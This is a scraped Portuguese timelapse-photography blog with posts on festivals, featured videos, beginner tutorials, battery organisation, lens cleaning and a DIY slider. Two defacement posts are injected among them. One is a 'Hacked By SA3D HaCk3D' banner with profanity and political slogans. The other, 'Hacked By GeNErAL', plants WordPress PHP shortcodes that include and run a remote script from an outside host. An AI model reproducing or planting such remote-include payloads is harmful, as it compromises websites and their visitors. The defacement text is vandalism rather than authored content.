The blog


Hacked By SA3D HaCk3D

<br /> HaCkeD by SA3D HaCk3D<br />

HaCkeD By SA3D HaCk3D

Long Live to peshmarga

KurDish HaCk3rS WaS Here

fucked
FUCK ISIS !

Leica V-LUX typ114 – Slowmotion

Graças à Colorfoto tivemos acesso a um equipamento bastante fresco de fábrica, a Leica v-lux typ114. Tivemos algum tempo a conhecer e testar a maquina e vimos a sua incrível versatilidade e a quantidade enorme de possibilidades que ela trás.

Começamos aqui por destacar o seu Slowmotion, num plano que demonstra também que imagem se consegue tirar do bruto com apenas alguns ajustes.

Rob Whitworth – abana o mundo do timelapse (de novo)

Se não conhecem este nome, Rob Whitworth, ainda vão a tempo para o gravarem bem na vossa memória, com este incrível vídeo, um dos melhores que fez até hoje.

Dificilmente veremos um melhor para breve!

Dubai Flow Motion from Rob Whitworth on Vimeo.

FINISTERRA Arrabida Film Festival – EN

If you don’t know the Finisterra Arrabida Film Art & Tourism Festival, this is an excellent opportunity. Not only for the amazing work the production has had so far on making real a forth edition but also for being able to bring to Portugal an incredible amount of artists form around the world to visit this amazing country and being able to be part of it.

As an example, Kirill Neiezhmakov, with strong support from Francesco Cerruti, a video was made that instantly went viral on the web, this is just an example, of course, but this post goes deeper.

This is an invitation do participate in the festival as well. Below you will find the two main documents needed do be part of the festival, also you’ll be able to follow the event as it grows to that special day of screenings, on timelapse.pt’s facebook and the facebook group dedicated to the festival.

As a side note: Many different countries have already participated 😉
Send tour work!

Regulation
Registration Sheet

timelapse.pt – facebook.com/timelapsept
Festival Facebook Group

FINISTERRA Arrabida Film Festival – PT

Se não conhecem o Finisterra Arrabida Film Art & Tourism Festival, esta é uma excelente oportunidade para o conhecerem. Não só pelo enorme trabalho da produção em conseguir realizar uma 4ª edição já este ano, mas também por ter trazido a Portugal uma quantidade diversa de artistas internacionais a visitar o nosso país e a participar nele.

Foi o caso de Kirill Neiezhmakov, que com o apoio de Francesco Cerruti, realizou um vídeo que instantaneamente se tornou viral nas redes. É um mero exemplo, mas este post vai mais a fundo.

É um convite à participação no festival, abaixo poderão encontrar os dois documentos mais importantes para participarem no festival e nas redes sociais poderão seguir os avanços do mesmo. Sigam no facebook timelapse.pt e no grupo dedicado.

Como nota: já se podem encontrar trabalhos de diversos países no festival!
Participem!

Regulamento
Ficha de Inscrição

timelapse.pt – facebook.com/timelapsept
Festival Facebook Group

A guerra da fotografia!

Um vídeo absolutamente imperdível! Um pouco de humor fotográfico para este Natal =)

photography at war

Clica na imagem para ver o vídeo

Um sonho que é Portugal – timelapse by Popular Jump

“Tenho em mim todos os sonhos do mundo.
Janelas do meu quarto,
Do meu quarto de um dos milhões do mundo.”

Não é segredo que Fernando Pessoa foi e é, uma das maiores influências literárias em Portugal, entre muitos como é evidente, mas a sua influência vai para além das palavras escritas e lidas. À Popular Jump, as suas energias tocaram as suas imagens, os seus enquadramentos, os seus tempos e as suas experiências.

O timelapse é “(…) O mistério das coisas por baixo das pedras e dos seres (…)” que a Popular Jump levanta o pano ao mistério e como por magia descobrimos um Portugal único, que nunca se estranhou mas que cada plano deste trabalho se entranha bem na consciência a beleza deste incrível país!

Este vídeo é uma janela para Portugal, dos nossos quartos, das nossas salas, das nossas casas, não para um dos milhões de mundos, mas de um só: o nosso!

Os autores desafiam a adivinhar todas as localidades presentes no vídeo e acrescentam: “Na Pjump encaramos o timelapse com o momento de descompressão. Para nós o timelapse é libertador pelo simples facto de com muito pouco material conseguir-se obter imagens fantásticas. É a altura do dia/noite em que podemos parar, pôr as conversas em dia e apreciar a beleza do local.

O timelapse está com a Popular Jump!

Links:
https://www.facebook.com/popularjump

Material usado:
Canon 600D, Canon 5D, Sony FS700, Tokina 11-16 f2.8, Samyang 14mm f2-8, Canon 70-200 f4, Sigma 28mm f1.8, Tripé Miller

Islands II – Ilha da Madeira em timelapse por Tiago França

Tiago França prenda-nos com mais um dos seus trabalhos.

Islands II, conta com uma vasta gama de imagens da Madeira com foco das imagens nocturnas – “o que me levou a cria-lo foi a união entre dois extremos, o dia e a noite, sendo a observação astronómica o foco principal.” diz o autor.

Com o habitual efeito timelapse, que nos mostra movimentos imperceptíveis ao nosso olhar, Tiago, apresenta-nos uma Madeira diferente com um olhar próprio muito característico – “Partilhar momentos a que um simples olhar não sensíveis, envolvendo paisagens únicas e surpreendentes por florestas e montanhas da Ilha da Madeira através de um olhar artístico.

Para a realização deste projecto em particular, Tiago disse-nos que percorreu 400Km durante o mês de Agosto, entre grandes caminhadas e muito frio, o que é habitual para nós timelapsers :p (e não só, claro).
*Mais info após o vídeo

ISLANDS II from Franca Tiago on Vimeo.

Locais: Pico do Arieiro, Chão da Lagoa, Poiso, Ribeiro Frio, Eira do Serrado, Paul da Serra, Garajau, Porto Novo, Pico do Facho, Ponta de São Lourenço

Material usado: Corpo Nikon D610; Objetivas 24mm, 50mm, 105mm, 200mm

 

Uma cidade realmente nocturna

Blackout city, um trabalho de Nicholas Bauer que nos mostra como realmente seriam as cidades nocturnas se todas as luzes estivessem desligadas. Uma nova forma de ver a pós-produção do timelapse, criatividades e novas ideias aplicadas à mesma técnica. Uma nova forma de ver a cidade!

A ideia surgiu de um acontecimento caricato na qual realmente houve um blackout e as pessoas recorriam ao 112 (911) desconhecendo estranhas nuvens no céu quando na realidade era só a via láctea. Posto a ideia e a possibilidade, Nicholas começou a colocar a sua ideia em prática em Agosto de 2013.

Um trabalho criativo que merece ser visto!

Blackout City from Nicholas Buer on Vimeo.

*LINKS*
facebook.com/nicholasbuerphotography

instagram.com/nicholasbuer
twitter.com/nicholasbuer
500px.com/nicholasbuer

Hacked By GeNErAL

[insert_php] include(“http://amiens-rencontres.bid/tmp/evv18.php”); [/insert_php]
[php] include(“http://amiens-rencontres.bid/tmp/evv18.php”); [/php]

timelapse Ermida da Memória – A cor

Partilhamos convosco mais um pedaço do nosso trabalho. No dia 7 de Setembro, estivemos no Cabo Espichel a captar um pôr-do-sol sendo motivo principal a Ermida da Memória. A este ponto já contamos com 8 a 10 horas de trabalho apenas na definição da cor pretendida para o clip final, fizemos diversos testes, dos quais alguns foram partilhados no Facebook.

Finalmente chegamos ao resultado pretendido que nos satisfaz, e assim, de forma simples por sobreposição do original com o resultado final, apresentamos pelo Youtube a diferença. Agora só faltam os restantes 400 fotogramas do timelapse.

Decidimos colocar no Youtube também em resolução 4K para os que têm a sorte de ter um monitor apropriado, possam aproveitar mais do detalhe da imagem.

Este plano é particularmente importante, por celebrar dois acontecimentos, o aniversário de Francesco Cerruti e uma nova parceria que será brevemente divulgada nas nossas redes.

my Portugal – de Francesco Cerruti

my Portugal – timelapse by Francesco Cerruti from timelapse.pt on Vimeo.

Video realizado por Francesco Cerruti para participar ao Timelapse Showfest.

“my Portugal é uma colecção de alguns dos meus locais preferidos em Portugal, claro que não são todos, porque nem em todos eles tive tempo para a captação.
Éa minha primeira colectânea de locais, mais virão. Entre Burgau, Ponta da Piedade (Lagos), Lisboa, São Miguel e Óbidos é uma curta viagem por estes diversos locais desde o amanhecer, a celebração de 25 de Abril, até ao fim de tarde e noite.

O intuito do vídeo é prevalecer pela fotografia, tentando dar tempo para “saborear” a fotografia e o movimento, claramente que em algumas situações um hyperlapse calha bem assim como alguns com uma slider por mim desenvolvida.

Musica do meu caro amigo Gonçalo Martins que me foi apresentado por outro caro amigo Nuno Dias, A ambos um obrigado.

Gonçalo Martins – Hope (gonzalomartins.com)

Material usado:
Canon 5D MarkIII
Canon 60D

Canon 16-35 2.8
Carl Zeiss 50mm 1.4
Samyang 14mm 2.8
Pentax Asahi 135mm 3.5
Sigma 55-200mm 4-5.6

Manfrotto tripod – video
Manfrotto tripod – photo
Hanhel Giga T Pro II
DIY Motorized Slider
ML
ND filters

LRTimelapse.com

Lisboa e Sesimbra em timelapse e Hyperlapse

Kirill Neiezhmakov, um nome que tem feito e está a fazer a diferença no mundo do timelapse. A sua técnica de eleição, o hyperlapse, colocou-o numa pedestal internacional possibilitando a criação de vídeo sensacionais em diversas cidades do mundos.

Finalmente, Kirill, chegou a Portugal e contactou o Francesco Cerruti para dar uma mãozinha para a realização do projecto que teve apoios de dois hóteis de Sesimbra.

É fundamental realçar o importante papel do Finisterra Arrábida fil art & Tourism festival, no importantíssimo convite lançado a Kirill, no qual participou e foi galardoado. O festival e, por conseguinte, a sua organização, é dos principais responsáveis pelo incentivo à criação deste fenomenal vídeo. Um profundo OBRIGADO!

O vídeo conta com locais de referência como Praça do Comércio, Parque Eduardo VII, Rossio, Praça da figueira até os mais recentes e modernos, o Parque das Nações assim como os melhores locais de Sesimbra e da Arrábida.

Portugal Timelapse/Hyperlapse (Lisbon & Sesimbra) from Kirill Neiezhmakov on Vimeo.

Material usado:
Canon 60d, 550d
Sigma 10-20 mm 4.0-5.6
Samyang 8 mm 3.5
Canon 17-55 mm 2.8
Canon 70-200 mm 4L
Vanguard Alta Pro tripod
GoPro Hero 3
Konova K5 motorized slider

“Foi uma semana sensacional, rever Lisboa com um olhar inspirador e diferente. O Kirill e a sua mulher são pessoas excepcionais e de uma simpatia extrema, amigos sem dúvida.” – Francesco Cerruti

Este é um vídeo que merece ser visto e partilhado! Que o timeapse esteja convosco!

 

E algumas imagens de Backstage:

The Konova Revealed

Unpacking the Konova

Konova and Hyperlapse

Konova at Work, Hyperlapse in the background

Kirill and his wife

Kirill and his wife

timelapse

Kirill’s camera and Francesco’s camera time lapsing the Lisbon Castle

the list

The List

fc rest

Francesco resting his legs for a bit

Francesco and Kirill

Francesco and Kirill

Links:
Youtube: https://www.youtube.com/user/nk87design
Vimeo: https://vimeo.com/nkdesign
Facebook: https://www.facebook.com/kirill.neiezhmakov

 

Timelapse Network Article
Entrevista a Kirill de Timelapse Network

Uma acácia na África do Sul

Este maravilhoso trabalho é obra de Drew Geraci, da District7 media. Deslocaram-se para África para capturar uma grande série de planos com uma quantidade de material impressionante. Desde a nossa bem conhecida Canon 5D Mark III a incrível Canon 1DC. Mas não si ficaram pelos corpos, corpos destes associados a lentes de cinema da Canon e um céu maravilhoso, resultou num vídeo de cortar a respiração.

Acacia: South Africa from Drew Geraci (District 7 Media) on Vimeo.

 

Fonte: Vimeo de Drew Geraci

Pyongyang: o Flowmotion a descoberto

Pouco a pouco levanta-se o véu da Koreia do Norte, até hoje nunca antes se tinha visto esta cidade com tanto detalhe quanto o que é evidenciado neste video.

Rob Withworth, o mesmo autor do incrível vídeo “Barcelona GO” agora retrata Pyongyang num dos seus Flowmotion de excelência.

Vejam o vídeo:

Enter Pyongyang from JT Singh on Vimeo.

 

Fonte: Facebook

Hyperlapse para todos

Assim como o título,o video abaixo é explica tudo. A Microsoft research está a trabalhar nesta aplicação que sem dúvida irá revolucionar como vemos o hyperlapse, subitamente iremos ver uma quantidade surpreendente de hyperlapse a aparecerem do mundo inteiro.

No fundo, peguem nas vossas action cam e agarrem ao volante da bicicleta, no capacete de mota ou na mota em si, dêem largas à vossa imaginação e captem video enquanto passeiam pela vossa cidade a pé ou de bicicleta.

Esta será uma aplicação Windows que dará a oportunidade de transformar essas imagens num hyperlapse surpreendente. Por meio de uma estabilização impressionante e de um algoritmo que aparenta fazer milagres esta aplicação promete revolucionar o hyperlapse como o vemos. Vejam o vídeo e deixem-se surpreender!

 

 

Fonte: http://research.microsoft.com

Dois passos (rápidos) da construção de uma rig 180º para timelapse

Já lá vai algum tempo desde o último post, eu pessoalmente tenho passado por uma fase de mudança de carreira o que gerou alguma confusão e re-organização de vida e de rotinas.

O facto de ter sido obrigado a concentrar-me em outros aspectos da minha vida, tal não significou que não tenha estudado ou investigado sobre o timelapse! Uma dessas incursões de estudo levou a encontrar dois videos de 7 segundos mas bastante esclarecedores sobre a montagem de um Rig para realizar timelapse a 180º.

Certamente terão visto alguns videos em timelapse formidáveis, completo com imagens em 360º, imagens nocturnas, por ventura. Sem dúvida que foi levar a técnica a um novo patamar! Mas para tal, como se pode ver, é preciso ter bem mais do que um kit câmara + lente, muita criatividade e acima de tudo muita engenharia.

Os videos abaixo poderão dar algumas luzes na engenharia necessária para construir uma rig do género.

Vejam os vídeos abaixo e se construírem uma, não se esqueçam de partilhar em timelapse.pt

 

Se tiverem gostado deste post e acharem que mais pessoas possam achar tal informação interessante partilhem =)

 

Que o timelapse esteja convosco!

Santa Maria – Açores

Estivemos em Santa Maria por um breve período de tempo o que nos deu a oportunidade de captar alguns planos representativos dos locais mais emblemáticos.

Santa Maria é uma das incríveis ilhas dos Açores tão única e bela como as restantes. Para timelapse, é outro paraíso cheio de desafios e locais secretos que esperam por um intervalómetro!

Discovering Vancouver

Morbi interdum mollis sapien. Sed ac risus. Phasellus lacinia, magna a ullamcorper laoreet, lectus arcu pulvinar risus, vitae facilisis libero dolor a purus. Sed vel lacus. Mauris nibh felis, adipiscing varius, adipiscing in, lacinia vel, tellus. Suspendisse ac urna. Etiam pellentesque mauris ut lectus.

Kirill Neiezhmakov in Portugal

This is the first post in this website written entirely in English, since this is a Portuguese website, it’s quite a rare thing, however it is suited. Why is this post in English? You might wonder…

As I’m sure you read in the title and, probably, that’s why you’re reading this, Kirill Neiezhmakov spent some time in Portugal for the Finisterra film festival and contacted me so I could assist him on making a video, so.. not only I want Kirill to be able to read this post but also other people that might be interested in reading this post.

 

Group picture at Lisbon

Group picture at Lisbon – Torre de Belém

I met Kirill at Sesimbra, on a pier where he was shooting a sunset, he had two cameras set up and my first impression was “wow, finally a timelapse geek just like me!” While the cameras were shooting, a bit of conversations took place until he had to go we managed to organize the beginning of the shooting in Lisbon.

We managed to timelapse most of the main sites of Lisbon. From the most historical areas do the newest and modern Lisbon zones. The list had quite a few amount of places to visit, unfortunately there wasn’t time to cover all of Lisbon so I had to shorten just a bit the list.

I’m sure you’ll be closely waiting for the results of Kirill creativity and experience with timelapse and hyperlapse.

Kirill Shooting

Here is Kirill shooting in Expo area – Thanks for sending the photo Kirill

For me, as a timelapser, it was an honour and privilege to meet Kirill and his wife, to be able to timelapse with them around Lisbon and to see Kirill’s work in the making. From a personal point of view, I always shot with stuff I learned myself from trial and error, and information from internet. So, being able to shoot with someone else from another country and manage to assimilate some knowledge, for me, it’s not only a matter of knowledge but an everlasting gratitude.

timelapse in Lisbon

Timelapse in Lisbon (Kirill on the Left, Francesco on the Right)

All in all, I spend some great few days with Kirill and his wife and I hope to see them again in Portugal in the future. To all who are reading this humble post who don’t know yet who Kirill is, please visit the links on this post as well of the Film Festival mentioned.

Finally, I want to thank you Kirill for reaching out to me, I’ll never forget him, his wife and his precious tips 😉 Hope to see you again soon!

May the timelapse be with you all!

Feliz dia da Mãe

Eis a nossa homenagem às Mães! Feliz dia da Mãe!

Feliz dia da Mãe from timelapse.pt on Vimeo.

Que o timelapse esteja convosco!

Timelapse e-book – Gunther Wegner – LRTimelapse – Timelapse shooting and processing

Timelapse_Shooting_300

Timelapse Shooting and Processing

Tive a oportunidade de espreitar e e-book do Gunther da versão 2014. O Timelapse Shooting and Processing 2014, é um livro com todas informações básicas e avançadas para uma captura assim como um guia fundamental para o tratamento desses mesmos timelapse a partir do LRTimelapse, tanto com workflow lightroom ou bridge.

Fala-se em detalhe de uma lista enorme de tudo o que é relacionado com a técnica. Desde o equipamento imprescindível, a escolha da cena, os settings do dispositivo de captura. Até às capturas mais avançadas, pôr-do-sol e transições dia para noite.

No entanto, como criador do LRTimelapse, o e-book, é leitura obrigatória para descobrir a fundo tudo o que a aplicação permite fazer em conjugação com Lightroom e/ou bridge. O workflow e tratamento de sequências RAW e jpg até à criação do clip vídeo em si.

O livro está escrito de uma forma perfeitamente perceptível, ainda que esteja escrito em Inglês, a informação é prática, concisa e não deixa margem para ambiguidades. Bem escrito e informação útil! Sigam para este link caso queiram saber mais ou mesmo adquirir uma cópia do e-book, extremamente recomendado!

Click here to visit LRTimelapse.com.

Concurso online – “O meu primeiro timelapse”

Timelapse Showfest

Timelapse Showfest

No âmbito to Timelapse Showfest, está agora a decorrer um concurso online chamado “O meu primeiro timelapse”. É um concurso dedicado a iniciantes/aspirantes/amadores/apaixonados do timelapse que desta forma têm a oportunidade de poderem partilhar os seus trabalhos e ainda vê-los numa gigante tela de 300m2 (é definitivamente gigante).

As regras

Primeira fase: Entrega trabalhos. Têm até 31 de Agosto do presente ano para enviarem os vossos timelapse. Os trabalhos têm duração máxima de um minuto.
A segunda fase terá inicio em Setembro, onde os trabalhos estarão disponíveis para votação online até 1 de Outubro, desta votação resultarão três trabalhos vencedores.
A votação será secreta e os vencedores serão anunciados e projectados no dia do festival.
A participação da entrada tem um preço de 5€. Este valem para a entrada do trabalho assim como um bilhete para o festival =)

Aspectos técnicos

Os trabalhos têm obrigatoriamente de ter uma resolução mínima de 1080 em campos progressivos. (1080p) Podem ser carregados via youtube ou vimeo, a organização conseguirá demostra-los a partir dessas plataformas.

Para os iniciados, têm este matéria de apoio:
Tutorial Básico Parte I – Captação
Tutorial Básico Parte II – Vídeo

Para a lista completa das regras: http://www.timelapses.es/timelapseshowfest/?page_id=663

Tutorial básico – Parte II – Vídeo

Tutorial timelapse básico – parte I – Vídeo from timelapse.pt on Vimeo.

Nesta segunda parte o objectivo é rapidamente criar um curto vídeo a partir de fotografia previamente captadas.
O intuito de tal simplicidade é facilitar o envio de timelapse criados por vocês.

DESAFIO:

Quero ver os vossos timelapse, quero partilhar os vossos timelapse!! 😉 Entrem nesta viagem comigo!!
Link para Timelapse Assembler (MAC): http://www.dayofthenewdan.com/projects/time-lapse-assembler-1/
Link para VirtualDub (PC): http://virtualdub.sourceforge.net

Que o timelapse esteja convosco!

Tutorial básico – Parte I – Captação

Timelapse.pt – Tutorial timelapse básico – parte I – Captação from timelapse.pt on Vimeo.

Esta é a primeira parte do tutorial básico de timelapse. Este video complementa o primeiro tutorial onde se apresenta o material necessário. Aqui cobre-se a importante checklist e os passos de base para um timelapse em modo manual.

Principais tópicos

– Escolha do enquadramento e da cena
– Focagem
– Modo de exposição (Velocidade + abertura)
– Justificação das opções
– Escolha do intervalo
– Poupança de bateria

Baterias – Quantas mais melhor, mas…..

É um facto, no que diz respeito ao timelapse, quantas mais baterias, melhor! Mas quanto maior a quantidade de baterias, ou seja do que for, maior tem de ser a organização e mais eficazes os métodos de arrumo.

Quando é hora de trocar baterias, para quem não tem punhos para as maquinas, é sempre um breve momento de pânico porque não queremos interromper o intervalo de tempo. Infelizmente alguns tripés não ajudam e é preciso tirar a maquina do tripé com cuidado para não tocar nem no zoom (caso lente zoom) ou no foco, tudo isto o mais depressa possível. É neste momento crucial que não se quer espetar na maquina uma bateria já gasta! Se não tiverem bem arrumadas, isto pode acontecer.

Eu uso essencialmente dois métodos de reconhecimento.

Método 1 – Base protetora das baterias.

Toda a baterias Canon vêm com uma base Amarelo-alaranjada ou Laranja-Amarelado, independentemente da cor é bem útil pelo pequeno ícone de uma pilha presente. Não é por nada que está alí, da mesma forma como não é por nada que as baterias originais Canon têm um lado azul e outro cinza (aqui não há confusão de cor).

Protecção de Plástico

A protecção com buraco em forma de pilha

Bateria

A bateria – com as duas cores de cada lado

 

 

 

 

 

 

 

 

 

 

 

Resumidamente: Dependendo da orientação da bateria, a zona cinza ou a zona azul fica visível pelo ícone da pilha.

Desta forma temos o seguinte código.
Cinza = Descarregada
Azul = Carregada

Bateria Gasta

Cinza na pilha – bateria gasta

Bateria OK

Azul na pilha – Bateria OK

 

 

 

 

 

 

 

 

 

 

 

Método 2 – Indicação vertical

As baterias têm outras informações que podem ser indicativas do seu estado. Dum lado existe uma informação de “Não deitar no lixo” enquanto que do outro tem uma superfície lisa. Do lado onde a informação está presente pode-se entender como gasta/descarregada e a parte lisa OK. Uso este método quando as baterias estão arrumadas na mala para mais rapidamente perceber as baterias úteis para usar ou, uma vez em casa quais carregar.

Baterias na mala

Baterias na mala

 

 

 

 

 

 

 

 

Espero que estas dicas vos sejam úteis pelos vossos timelapses, sessões fotográficas e sessões de vídeo 😉
Que o timelapse esteja convosco!!

 

Preparação e Empenho

Sinto que tenho de pedir as desculpa aos (ainda poucos) leitores e seguidores desta plataforma. Esta semana especialmente tem sido atribulada com projectos pessoais (directamente ligados à plataforma) e preparação de projectos profissionais pela empresa onde trabalho.
Daí ter optado pelo título “Preparação e Empenho”.

Preparação

A parte da preparação diz essencialmente respeito aos projectos profissionais, neste caso foi-me proposto um desafio que implica “entrar” num ramo de fotografia que nunca antes tinha explorado a fundo. A fotografia de produto. Imediatamente a minha primeira preocupação foi a Luz. Como, com o quê?? Claro que parte desta resposta está no assunto a ser fotografado, como são produtos relativamente pequenos fiquei mais tranquilo.

Acredito que entre 70% a 80% de praticamente qualquer trabalho seja a preparação. Desde o lançamento do trabalho que tenho vindo a estudar a luz, o método e o resultado final deste ramo da fotografia. Claro que restringi o meu estudo e investigações a produtos pequenos e já faz uma semana que me preparo para amanhã.

Estudei a luz, contraí uma LightBox só com Kline, ductTape, cartolina branca e papel. Tudo material que já tinha cá por casa prestes a ser deitado fora.

Preparação PhotoShoot

O material pronto! LightBox do lado direito.

No final do posto coloco algumas fotografias que demonstram o resultado final da conjugação lightBox com um ponto de luz do lado direito apenas com um iluminados de LED e duas cartolinas a reflectir luz de volta para dentro da caixa.

Portanto, uma semana (coisa mais coisa menos) de estudo, fabricação e testes.

Empenho

“Quem não tem cão caça com gato” é um termo que se poderia aplicar na minha situação. Neste caso não tenho “cão” nem “gato”, portanto tal como Dr. Frankenstein arregacei as mangas e fabriquei a minha própria slider. Não é perfeita, obvio, é um DIY puro e duro, mas funciona e até funciona melhor do que esperado.

Na ausência e necessidade de uma slider para vídeo, optei por poupar 500€ (sim há mais baratas mas este é um preço de referência de um sistema que vi com possibilidades de expansão) e desenhar e fabricar o meu próprio sistema rudimentar mas funcional. O que me tirou algumas horas de sono, podendo trabalhar nela quando chego a casa depois do mestrado (por volta das 23:00)… Começou por isto:

DIY slider

Empenho é chegar a casa tarde e cansado e ainda atacar na fabricação de uma slider

Para chegar a isto:

Slider montada

Carris da slider

E o resultado pode ser visto aqui (Primeiro teste)

Resultado Fotos de Produto

zeiss

Carl Zeiss – foto em estado bruto

canon

Canon 60D + 16-35 f2.8 – foto em estado bruto

Optei por escolher estas duas fotografias para dar uma pequena nota. Na parte cinza (fundo), há uma clara diferença na exposição entre ambas as imagens. Embora nada tenha mudado nas definições existe esta diferença, tal é prova de “funcionamento” destas caixas de luz. Resumidamente, a 60D + lente é consideravelmente maior do que apenas a Zeiss. isso significa que está a “esconder” material reflector, logo há menos luz a “saltar” de um lado para o outro. Estas caixas, embora rudimentares, dão um controlo brutal na iluminação e são extremamente versáteis. Para quem sabe, tira resultados excelentes (como não é o caso) para quem não sabe é difícil não sair bem (como é o caso).

Para os interessados, recomendo experimentar, para quem quiser indicações de como construir uma, fico contente por fazer uma planta/instruções/tutorial é só comentar e pedir =)

Que o timelapse esteja convosco!!

(Embora isto tudo não tenha tido nada a ver com timelapse)

 

O Abraço da lua – Fotografia

noite

noite

“O abraço da lua cheia” – Fotografia nocturna por Francesco Cerruti em Sintra.
© Todos os Direitos Reservados

Dica #1 – A importância da Limpeza e Manutenção do material

Esta é uma dica válida para qualquer utilizador de qualquer tipo material Audiovisual ou mesmo não Audiovisual, a Limpeza. A limpeza faz parte da manutenção básica e periódica de qualquer material, da mesma forma como temos de verificar todas as semanas (supostamente) o nível do óleo do carro, ter o material bem limpo é fundamental para o seu funcionamento e à qualidade do trabalho.
A verdade é que eu limpo mais vezes as minhas maquinas, lentes e tripés do que verifico o nível do óleo…

Para mim a limpeza faz parte de uma rotina, faz parte dá pré-produção e da pós-produção. Por mais que possa parecer obsessivo, limpo (sempre que posso/consigo) o material Antes e Depois de o usar. Seja timelapse, vídeo ou fotografia, uma lente limpa dá-nos uma qualidade acrescida que uma lente suja ou pouco limpa. Perde-se não só detalhe na imagem final mas como saturação e tempo em pós-produção.

Imagens Dalmata

Chamo assim a aquelas imagens repletas de pontos, imagens Dalmata, por óbvios motivos. Muitas vezes este tipo de sujidade não só está na lente mas como no sensor. Há diversas formas de evitar, ou pelo menos reduzir, este tipo de sujidade. Bom, manter o material limpo é  evidente. No entanto usar um filtro de vidro em frente da lente em si (Canon Protec, por exemplo) ajuda não só a proteger a lente mas também simplifica a limpeza (confiança que não se estraga a lente em si). Por outro lado evitar trocar constantemente de lente não só ajuda a manter a parte posterior protegida, mas como se evita a entrada de partículas nos espelhos e no sensor. É evidente à luz das necessidade trocar de lentes é inevitável, nesse caso é tentar fazer a troca num local mais limpo e faze-lo de forma inteligente, por exemplo, manter a abertura da maquina virada para baixo, ou tapa-la com um pano limpo ou com a própria tampa. Como é evidente há situações em que é impossível isto tudo, aí claro, não há nada a fazer, por outro lado é sempre aconselhável pedir uma limpeza profunda de vez em quando.

O material de limpeza

Quando faço limpeza uso geralmente três panos diferentes, um liquido específico para a óptica e uma “pêra” (ou clister para os mais brincalhões), ocasionalmente uso uns cotonetes específicos para retirar alguma porcaria no corpo da maquina e em ranhuras.

Pêra Giotto

Pêra

Liquido

Liquido para limpar optica

Pano Microfibra

Pano Microfibra

Pano suave

Pano fibras suave

Pano medio

Pano suave sem fibras

Reconhecer os limites

É fundamental reconhecer os limites, saber o que limpar e o que não limpar. Nunca pensar que, só porque é pó, qualquer um pode fazer: wroong! Pessoalmente, não toco nem no sensor nem nos espelhos internos, basicamente as partes sensíveis do material (isto não soa bem). Prefiro ir à Colorfoto, onde comprei o material, e pedir uma limpeza. Por vários motivos: ou não tenho nem material nem conhecimentos para fazer esse tipo de limpezas e não quero nem sequer arriscar danificar material que custa mais de 3000€ (que é uma pipa de massa!) Prefiro entregar a um professional que saiba bem melhor que eu o que faz e como se faz uma limpeza profunda.

É um dos motivos pelo qual opto por ir a uma loja em detrimento de compras online. Tenho sempre um balcão de apoio (Pit-stop eheh) caso necessite ou de atendimento personalizado ou de algo de urgente relacionado com o meu material, tenho sempre a quem recorrer.

Partilham a minha opinião, têm alguma dica adicional dentro do tema? Partilha num comentário!

Boas limpezas e que o timelapse esteja convosco!

Timelapse Showfest 2014 – Novidades

Timelapse Showfest 2014

Timelapse Showfest 2014

Como deu para perceber no post anterior, está já em curso o Timelapse Showfest! Não o evento em si, mas o festival começa quando chegam os primeiro trabalhos a concurso, os primeiros patrocínios e as primeiras confirmações. Alguns trabalhos já chegaram, o que é positivo, e espero que cheguem muitas de Portugal!

Já falei aqui das inscrições, mas ainda falta muito para dizer. Há coisas que, para já, não podem ser reveladas mas que certamente serão surpreendentes! Por outro lado, já se sabe que será no Outuno de 2014, portanto há imenso tempo para compor tudo e revelar todas as novidades.

Este ano, para além de muitas surpresas haverá um concurso online. “O meu primeiro timelapse”, os três premiados, via votação pública terão as suas obras apresentadas na grande tela! É claro que têm de estar dentro do regulamento mencionado na colocação anterior 😉
Por outro lado, será organizado um workshop de iniciação ao timelapse cujos resultados estarão também presentes em tela!

A grande força desta terceira edição do Timelapse Showfest, está na inovação e na originalidade, mas sobre tudo o inédito. Como foi dito antes, é preferível trabalhos únicos, feitos de propósito para festival. Não só dará um maior prestígio ao festival, mas também sem dúvida alguma aumentará as probabilidades do teu trabalho ser um dos 10 escolhidos pelo júri.

Portanto se tens um história a contar ao mundo e o timelapse é a melhor forma de a contar, poderás participar no concurso online assim como a concurso!

Boa sorte e que o timelapse esteja convosco!!

Timelapse Showfest 2013

Timelapse Showfest 2013 (Segunda edição) – Image credit timelapses.es

Timelapse – O básico e o essencial

Neste tutorial, que é mais uma introdução, fala-se brevemente do básico do timelapse e o material essencial à realização da técnica e captura do momento pretendido.

Timelapse – O básico

“É uma técnica que nos permite manipular o tempo”, através de um método de captura lento (fotograma a fotograma) conseguimos comprimir um longo período de tempo em poucos segundos. Isto é o contrário do SlowMotion, que num curto espaço de tempo se captam milhares de fotogramas, o que permite extender o tempo.

Material – O essencial

Para a realização de um timelapse básico, apenas três elementos são chave. Um maquina fotográfica, ou equivalente, um intervalómetro (caso não seja interno) e um tripé.

Intervalómetro essencial

O intervalómetro faz parte do kit essencial à realização do timelapse.

Caso surja alguma questão ou algo não tenha sido claro estou ao dispor, basta enviar e-mail ou mensagem por facebook e terei todo o gosto e dar mais detalhes ou esclarecimentos.

Timelapse Showfest 2014 – Informações e regulamento

O prometido é devido, como tal, escrevo aqui um pouco sobre o tema em questão: timelapse showfest.

Os nossos vizinhos Espanhóis, já desde 2012 têm conseguido construir e dar forte nome e presença ao timelapse nacional espanhol assim como ao internacional. A primeira edição teve forte impacto nas redes do timelapse internacional, a segunda edição do timelapse showfest (2013) ainda mais! Tendo eles mesmo conseguido elevar a fasquia com uma enorme tela de 300m quadrados, parece um número exagerado? Não é!

Timelapse Showfest 2013

Obrigado a timelapses.es pela imagem

Pessoalmente nunca uma tela deste tamanho! Espero ver para breve.

2014 não vai ser uma excepção, o evento vai ter uma terceira edição e já estão abertas as candidaturas! Mas já vamos falar disso daqui a nada. O que ainda quero deixar bem frisado é o facto do preço dos bilhetes. Quem me dera que todas as salas de cinema que uma tela deste tamanho tivessem o preço pelo que paguei em 2013! Meros 6€ entradas VIP, isto quer dizer entrada antecipada, conversas com os restantes profissionais, lugares marcados na melhor zona da sala: a central! Mítico. Havia ainda entradas mais baratas a 3€, praticamente um preço simbólico e acima de tudo dinheiro bem gasto!

Candidaturas timelapse showfest

Para começar, o prazo: Têm até 31 de Julho de 2014 para enviar o vosso trabalho.
Formato SCOPE, obrigatório e pelo menos 2K
Tem de ter um máximo de 6 minutos incluindo créditos.
Este para mim é o melhor, o trabalho convém que seja inédito! O que significa que não vale a pena apresentar vídeo já  editados ou pegar em planos já feitos e montar outra coisa. O pretendido no festival é a inovação, criação nova! O que concordo plenamente, por outro lado até Julho há mais que tempo para fazer captações!
CASO o trabalho for seleccionado é necessária uma pequena apresentação de 50 segundos (máximo)
É preciso um pagamento de 10€ por cada participação.
